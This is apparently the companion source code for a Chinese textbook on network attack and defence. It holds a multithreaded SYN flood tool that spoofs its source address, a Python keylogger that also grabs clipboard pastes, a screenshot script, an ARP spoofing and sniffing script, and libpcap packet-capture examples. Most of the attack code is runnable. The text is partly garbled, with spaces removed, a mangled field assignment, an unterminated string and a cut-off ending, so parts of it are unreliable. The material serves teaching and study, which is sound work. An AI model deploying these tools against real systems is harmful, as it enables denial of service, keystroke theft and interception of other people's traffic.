《网络攻防原理与技术（第3版 ）》 源代码 吴礼发

第6章拒绝服务攻击/*===================================================*基于winpcap的多线程SYNFlood攻击源代码*运行平台：WinXP，Win2k3，WinVista，Win2k8，Win7*编译环境：VC6.0+winpcapSDK*====================================================*/#defineWIN32_LEAN_AND_MEAN#define_WSPIAPI_COUNTOF#include<windows.h>#include<winsock2.h>#include<stdio.h>#include<stdlib.h>#include<pcap.h>#include<packet32.h>#pragmacomment(lib,"ws2_32.lib")#pragmacomment(lib,"wpcap.lib")#pragmacomment(lib,"packet.lib")#defineMAXTHREAD 20#defineOID_802_3_CURRENT_ADDRESS 0x01010102#defineOPTION_LENTH 6#defineSYN_DEST_IP "2" //被攻击的IP#defineSYN_DEST_PORT 80 //被攻击的PORT#defineFAKE_IP "1" //伪装的IP#defineFAKE_MAC "\xB8\xAC\x6F\x1F\x26\xF6" //伪装的MAC//内存对齐设置必须是1#pragmapack(1)typedefstructet_header //以太网首部{ unsignedchar eh_dst[6]; //目的MAC unsignedchar eh_src[6]; //源MAC unsignedshort eh_type; //上层协议类型}ET_HEADER;typedefstructip_hdr //IP首部{ unsignedchar h_verlen; //版本与首部长度 unsignedchar tos; //区分服务 unsignedshort total_len; //总长度 unsignedshort ident; //标识 unsignedshort frag_and_flags;//3位的标志与13位的片偏移 unsignedchar ttl; //生存时间 unsignedchar proto; //协议 unsignedshort checksum; //首部校验和 unsignedint sourceIP; //源IP unsignedint destIP; //目的IP}IP_HEADER;typedefstructtcp_hdr //TCP首部{ unsignedshort th_sport; //16位源端口 unsignedshort th_dport; //16位目的端口 unsignedint th_seq; //32位序列号 unsignedint th_ack; //32位确认号 unsignedshort th_data_flag; //16位标志位 unsignedshort th_win; //16位窗口大小 unsignedshort th_sum; //16位校验和 unsignedshort th_urp; //16位紧急数据偏移量 unsignedint option[OPTION_LENTH];}TCP_HEADER;typedefstructpsd_hdr //TCP伪首部{ unsignedlong saddr; //源地址 unsignedlong daddr; //目的地址 char mbz; char ptcl; //协议类型 unsignedshort tcpl; //TCP长度}PSD_HEADER;typedefstruct_SYN_PACKET //最终SYN包结构{ ET_HEADER eth; //以太网头部 IP_HEADER iph; //arp数据包头部 TCP_HEADER tcph; //tcp数据包头部}SYN_PACKET;#pragmapack()typedefstruct_PARAMETERS //传递给线程的参数体{ unsignedint srcIP; unsignedint dstIP; unsignedshort dstPort; unsignedchar* srcmac; unsignedchar dstmac[6]; pcap_t* adhandle;}PARAMETERS,*LPPARAMETERS;//获得网卡的MAC地址unsignedchar*GetSelfMac(char*pDevName){ staticu_charmac[6]; memset(mac,0,sizeof(mac)); LPADAPTERlpAdapter=PacketOpenAdapter(pDevName); if(!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE)) { returnNULL; } PPACKET_OID_DATAOidData= (PPACKET_OID_DATA)malloc(6+sizeof(PACKET_OID_DATA)); if(OidData==NULL) { PacketCloseAdapter(lpAdapter); returnNULL; } OidData->Oid=OID_802_3_CURRENT_ADDRESS; OidData->Length=6; memset(OidData->Data,0,6); BOOLEANStatus=PacketRequest(lpAdapter,FALSE,OidData); if(Status) { memcpy(mac,(u_char*)(OidData->Data),6); } free(OidData); PacketCloseAdapter(lpAdapter); returnmac;}//计算校验和unsignedshortCheckSum(unsignedshort*buffer,intsize){ unsignedlongcksum=0; while(size>1) { cksum+=*buffer++; size-=sizeof(unsignedshort); } if(size) { cksum+=*(unsignedchar*)buffer; } cksum=(cksum>>16)+(cksum&0xffff); cksum+=(cksum>>16); return(unsignedshort)(~cksum);}//封装ARP请求包voidBuildSYNPacket(SYN_PACKET&packet, unsignedchar*source_mac, unsignedchar*dest_mac, unsignedlongsrcIp, unsignedlongdestIp, unsignedshortdstPort){ PSD_HEADERPsdHeader; //定义以太网头部 memcpy(packet.eth.eh_dst,dest_mac,6); memcpy(packet.eth.eh_src,source_mac,6); packet.eth.eh_type =htons(0x0800); //ARP协议类型值为0x0800 //定义IP头 packet.iph.h_verlen =0; packet.iph.h_verlen =((4<<4)|sizeof(IP_HEADER)/sizeof(unsignedint)); packet.iph.tos =0; packet.iph.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); packet.iph.ident =1; packet.iph.frag_and_flags=htons(1<<14); packet.iph.ttl =128; to =IPPROTO_TCP; packet.iph.checksum =0; packet.iph.sourceIP =srcIp; packet.iph.destIP =destIp; //定义TCP头 packet.tcph.th_sport=htons(rand()%60000+1024); packet.tcph.th_dport=htons(dstPort); packet.tcph.th_seq =htonl(rand()%900000000+100000); packet.tcph.th_ack =0; packet.tcph.th_data_flag=0; packet.tcph.th_data_flag=(11<<4|2<<8); packet.tcph.th_win =htons(512); packet.tcph.th_sum =0; packet.tcph.th_urp =0; packet.tcph.option[0]=htonl(0X020405B4); packet.tcph.option[1]=htonl(0x01030303); packet.tcph.option[2]=htonl(0x0101080A); packet.tcph.option[3]=htonl(0x00000000); packet.tcph.option[4]=htonl(0X00000000); packet.tcph.option[5]=htonl(0X01010402); //构造伪头部 PsdHeader.saddr=srcIp; PsdHeader.daddr=packet.iph.destIP; PsdHeader.mbz=0; PsdHeader.ptcl=IPPROTO_TCP; PsdHeader.tcpl=htons(sizeof(TCP_HEADER)); BYTEBuffer[sizeof(PsdHeader)+sizeof(TCP_HEADER)]={0}; memcpy(Buffer,&PsdHeader,sizeof(PsdHeader)); memcpy(Buffer+sizeof(PsdHeader),&packet.tcph,sizeof(TCP_HEADER)); packet.tcph.th_sum=CheckSum((unsignedshort*)Buffer, sizeof(PsdHeader)+sizeof(TCP_HEADER)); memset(Buffer,0,sizeof(Buffer)); memcpy(Buffer,&packet.iph,sizeof(IP_HEADER)); packet.iph.checksum=CheckSum((unsignedshort*)Buffer,sizeof(IP_HEADER)); return;}//发包线程函数DWORDWINAPISYNFloodThread(LPVOIDlp){ PARAMETERSparam; param=*((LPPARAMETERS)lp); Sleep(10); while(true) { SYN_PACKETpacket; BuildSYNPacket(packet,param.srcmac,param.dstmac, param.srcIP,param.dstIP,param.dstPort); if(pcap_sendpacket(param.adhandle, (constunsignedchar*)&packet, sizeof(packet))==-1) { fprintf(stderr,"pcap_sendpacketerror.\n"); } } return1;}intmain(intargc,char*argv[]){ unsignedlongfakeIp=inet_addr(FAKE_IP); //要伪装成的IP地址 if(fakeIp==INADDR_NONE) { fprintf(stderr,"InvalidIP:%s\n",FAKE_IP); return-1; } unsignedlongdestIp=inet_addr(SYN_DEST_IP); //目的IP if(destIp==INADDR_NONE) { fprintf(stderr,"InvalidIP:%s\n",SYN_DEST_IP); return-1; } unsignedshortdstPort=SYN_DEST_PORT; //目的端口 if(dstPort<0||dstPort>65535) { fprintf(stderr,"InvalidPort return-1; } pcap_if_t *alldevs; //全部网卡列表 pcap_if_t *d; //一个网卡 pcap_addr_t *pAddr; //网卡地址 charerrbuf[PCAP_ERRBUF_SIZE]; //错误缓冲区 if(pcap_findalldevs(&alldevs,errbuf)==-1) //获得本机网卡列表 { fprintf(stderr,"Errorinpcap_findalldevs:%s\n",errbuf); exit(1); } inti=0; for(d=alldevs;d;d=d->next) { printf("%d",++i); if(d->description) printf(".%s\n",d->description); else printf(".Nodescriptionavailable\n"); } if(i==0) { fprintf(stderr,"\nNointerfacesfound!\n"); return-1; } printf("Entertheinterfacenumber(1-%d):",i); intinum; scanf("%d",&inum);//用户选择的网卡序号 if(inum<1||inum>i) { printf("\nInterfacenumberoutofrange.\n"); pcap_freealldevs(alldevs); return-1; } HANDLE threadhandle[MAXTHREAD]; PARAMETERSparam; //设置目的MAC地址 memcpy(param.dstmac,FAKE_MAC,6); //填充线程的参数体 param.dstIP=destIp; param.srcIP=fakeIp; param.dstPort=dstPort; //移动指针到用户选择的网卡 for(d=alldevs,i=0;i<inum-1;d=d->next,i++); param.srcmac=GetSelfMac(d->name); printf("发送SYN包，本机(%.2X-%.2X-%.2X-%.2X-%.2X-%.2X)试图伪装成%s\n", param.srcmac[0], param.srcmac[1], param.srcmac[2], param.srcmac[3], param.srcmac[4], param.srcmac[5],FAKE_IP); if((param.adhandle=pcap_open_live(d->name,65536,0,1000,errbuf))==NULL) { fprintf(stderr,"\nUnabletoopenadapter.\n"); pcap_freealldevs(alldevs); return-1; } pAddr=d->addresses; while(pAddr) { //创建多线程 for(inti=0;i<MAXTHREAD;i++) { threadhandle[i]=CreateThread(NULL,0,SYNFloodThread,(void*)¶m,0,NULL); if(!threadhandle) { printf("CreateThreaderror:%d\n",GetLastError()); } Sleep(100); } pAddr=pAddr->next; } printf("退出请输入q或者Q！\n"); charcQuit; do{ cQuit=getchar(); }while(cQuit!='q'&&cQuit!='Q'); return0;}

第7章计算机木马###############################################################################程序名：keylogger.py#功能：利用Python第三方库PyHook实现键盘记录#说明：运行平台Windows。它利用Windows的SetWindowsHookEx函数注册了一个自#定义的钩子函数，通过函数就能截获用户的按键消息。##############################################################################fromctypesimport*importpythoncomimportpyHookimportwin32clipboarduser32=windll.user32kernel32=windll.kernel32psapi=windll.psapicurrent_window=Nonedefget_current_process():hwnd=user32.GetForegroundWindow()#获得前台窗口句柄pid=c_ulong(0)user32.GetWindowThreadProcessId(hwnd,byref(pid))process_id="%d"%pid.value#获得进程PIDexecutable=create_string_buffer("\x00"*512)h_process=kernel32.OpenProcess(0x400|0x10,False,pid)psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)#获得进程名window_title=create_string_buffer("\x00"*512)length=user32.GetWindowTextA(hwnd,byref(window_title),512)#获得窗口名printprint"[PID:%s-%s-%s]"%(process_id,executable.value,window_title.value)printkernel32.CloseHandle(hwnd)kernel32.CloseHandle(h_process)defkey_event(event):globalcurrent_windowifevent.WindowName!=current_window:#检查目标是否切换了窗口current_window=event.WindowNameget_current_process()ifevent.Ascii>32andevent.Ascii<127:#检查是否为常规按键printchr(event.Ascii),else:ifevent.Key=="V":#如果是Ctrl+V，则获取剪贴板内容win32clipboard.OpenClipboard()pasted_value=win32clipboard.GetClipboardData()win32clipboard.CloseClipboard()print"[PASTE]-%s"%(pasted_value),else:print"[%s]"%event.Key,returnTrue#返回到下一个钩子事件defkey_logger():hooker=pyHook.HookManager()#创建钩子函数管理器hooker.KeyDown=key_event#注册钩子按键事件的处理函数hooker.HookKeyboard()#创建键盘钩子pythoncom.PumpMessages()if__name__=='__main__':key_logger()

###############################################################################程序名：screenshot.py#功能：利用Python第三方库PyWin32实现截取屏幕功能，将截取的屏幕保存在C盘#上的文件screen.bmp中。#说明：运行平台Windows。##############################################################################importwin32guiimportwin32uiimportwin32conimportwin32apidefscreen_shot():hdesktop=win32gui.GetDesktopWindow()#获得桌面窗口句柄#获得显示器尺寸width=win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)height=win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)left=win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)top=win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)desktop_dc=win32gui.GetWindowDC(hdesktop)#创建设备描述表img_dc=win32ui.CreateDCFromHandle(desktop_dc)mem_dc=img_dc.CreateCompatibleDC()#创建基于内存的设备描述表screenshot=win32ui.CreateBitmap()screenshot.CreateCompatibleBitmap(img_dc,width,height)#创建位图对象mem_dc.SelectObject(screenshot)mem_dc.BitBlt((0,0),(width,height),img_dc,(left,top),win32con.SRCCOPY)#复制屏幕screenshot.SaveBitmapFile(mem_dc,'c:\\screen.bmp')#将位图保存到文件mem_dc.DeleteDC()#释放对象win32gui.DeleteObject(screenshot.GetHandle())if__name__=='__main__':screen_shot()

##############################################################################程序名：arpspoof.py#功能：利用Python开发包Scapy实现ARP欺骗#说明：运行平台Linux。##############################################################################fromscapy.allimport*importosimportsysimportthreadinginterface="eth0"target_ip="22"gateway_ip=""packet_count=1000spoofing=Truedefget_mac(ip_address):responses,unanswered=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)fors,rinresponses:returnr[Ether].srcreturnNonedefspoof_target(gateway_ip,gateway_mac,target_ip,target_mac):globalspoofingspoof_target=ARP()spoof_target.op=2spoof_target.psrc=gateway_ipspoof_target.pdst=target_ipspoof_target.hwdst=target_macspoof_gateway=ARP()spoof_gateway.op=2spoof_gateway.psrc=target_ipspoof_gateway.pdst=gateway_ipspoof_gateway.hwdst=gateway_macprint"[+]BeginningtheARPspoof.[CTRL+Ctostop]"whilespoofing:send(spoof_target)send(spoof_gateway)time.sleep(2)print"[*]ARPspoofattackfinished."returndefrestore_target(gateway_ip,gateway_mac,target_ip,target_mac):print"[*]Restoringtarget..."send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)defarp_spoof():conf.iface=interfaceconf.verb=0print"[+]Settingup%s"%interfacegateway_mac=get_mac(gateway_ip)#1.获取网关MAC地址ifgateway_macisNone:print"[-]FailedtogetgatewayMAC.Exiting."sys.exit(0)else:print"[+]Gateway%sisat%s"%(gateway_ip,gateway_mac)target_mac=get_mac(target_ip)#2.获取目标MAC地址iftarget_macisNone:print"[-]FailedtogettargetMAC.Exiting."sys.exit(0)else:print"[+]Target%sisat%s"%(target_ip,target_mac)print"[+]startspoofthread."spoof_thread=threading.Thread(target=spoof_target,args=(gateway_ip,gateway_mac,target_ip,target_mac))#3.启动ARP欺骗进程spoof_thread.start()try:print"[+]Startingsnifferfor%dpackets"%packet_countbpf_filter="iphost%s"%target_ippackets=sniff(count=packet_count,filter=bpf_filter,iface=interface)#4.抓取目标流量exceptKeyboardInterrupt:passfinally:print"[+]Writingpacketstoarpspoof.pcap"wrpcap('arpsoof.pcap',packets)#5.将抓取的流量包写入到文件spoofing=Falsetime.sleep(2)restore_target(gateway_ip,gateway_mac,target_ip,target_mac)#6.还原网络配置sys.exit(0)if__name__=='__main__':arp_spoof()

第9章网络监听技术/**********************************************************************程序9-1：pcaptest1.c的源代码*功能：捕获一个网络分组，然后分析其类型并打印有关类型和地址信息。*********************************************************************/#include<stdio.h>#include<stdlib.h>#include<pcap.h>/*有些系统中应为pcap/pcap.h*/#include<errno.h>#include<sys/socket.h>#include<netinet/in.h>#include<arpa/inet.h>#include<netinet/if_ether.h>/*包括net/ethernet.h*/intmain(intargc,char**argv){inti;char*dev;charerrbuf[PCAP_ERRBUF_SIZE];pcap_t*descr;constu_char*packet;structpcap_pkthdrhdr;/*结构类型在头文件pcap.h中定义*/structether_header*eptr;/*结构类型在头文件net/ethernet.h中定义*/u_char*ptr;/*指向硬件头文息*/dev=pcap_lookupdev(errbuf);/*查找网络设备*/if(dev==NULL){printf("%s\n",errbuf);exit(1);} else printf("DEV:%s\n",dev);descr=pcap_open_live(dev,BUFSIZ,0,-1,errbuf);/*以非混杂模式打开网络设备*/if(descr==NULL){printf("pcap_open_live():%s\n",errbuf);exit(1);}packet=pcap_next(descr,&hdr);/*从打开的网络设备中捕获分组*/if(packet==NULL){printf("Didn'tgrabpacket\n");exit(1);}/*成功地捕获到一个分组*//*结构pcap_pkthdr的定义：structpcap_pkthdr{structtimevalts;timestampbpf_u_int32caplen;lengthofportionpresentbpf_u_int32;lebgththispacket(offwire)}*/printf("Grabbedpacketoflength%d\n",hdr.len);/*分组长度*/printf("Recievedat..%s\n",ctime((consttime_t*)&hdr.ts.tv_sec));/*捕获时间*/printf("Ethernetaddresslengthis%d\n",ETHER_HDR_LEN);/*以太网地址*//*分析以太网帧头信息.*/eptr=(structether_header*)packet;if(ntohs(eptr->ether_type)==ETHERTYPE_IP)/*是否是IP包*/{printf("Ethernettypehex:%xdec:%disanIPpacket\n",ntohs(eptr->ether_type),ntohs(eptr->ether_type));}elseif(ntohs(eptr->ether_type)==ETHERTYPE_ARP)/*是否是ARP包*/{printf("Ethernettypehex:%xdec:%disanARPpacket\n",ntohs(eptr->ether_type),ntohs(eptr->ether_type));}else{/*其它类型的包*/printf("Ethernettype%xnotIP",ntohs(eptr->ether_type));exit(1);}/*打印目的地址*/ptr=eptr->ether_dhost;i=ETHER_ADDR_LEN;printf("DestinationAddress:");do{printf("%s%x",(i==ETHER_ADDR_LEN)?"":":",*ptr++);}while(--i>0);printf("\n");/*打印源地址*/ptr=eptr->ether_shost;i=ETHER_ADDR_LEN;printf("SourceAddress:");do{printf("%s%x",(i==ETHER_ADDR_LEN)?"":":",*ptr++);}while(--i>0);printf("\n");return0;}

/*******************************************************************************程序9-2：pcaptest2.c的源代码*功能：演示如何使用pcap_loop()，主要功能是连续捕获指定个数的网络分组后退出。******************************************************************************/#include<pcap.h>#include<stdio.h>#include<stdlib.h>#include<errno.h>#include<sys/socket.h>#include<netinet/in.h>#include<arpa/inet.h>#include<netinet/if_ether.h>/*定义函数pcap_loop()收到一个分组时的处理函数，这里仅打印收到的分组的序号，并没有对收到的分组作进一步的分析。它作为pcap_loop()的一个传入参数*/voidmy_callback(u_char*useless,conststructpcap_pkthdr*pkthdr,constu_char*packet){staticintcount=1;fprintf(stdout,"%d,",count);fflush(stdout);count++;}intmain(intargc,char**argv){inti;char*dev;charerrbuf[PCAP_ERRBUF_SIZE];pcap_t*descr;constu_char*packet;structpcap_pkthdrhdr;/*pcap.h*/structether_header*eptr;/*net/ethernet.h*/if(argc!=2){fprintf(stdout,"Usage:%snumpackets\n",argv[0]);return0;}dev=pcap_lookupdev(errbuf);/*查找网络设备*/if(dev==NULL){printf("%s\n",errbuf);exit(1);}/*打开网络设备*/descr=pcap_open_live(dev,BUFSIZ,0,-1,errbuf);if(descr==NULL){printf("pcap_open_live():%s\n",errbuf);exit(1);}/*调用pcap_loop()捕获atoi(argv[1])个网络分组后函数返回,每收到一个分组就调用my_callback()一次*/pcap_loop(descr,atoi(argv[1]),my_callba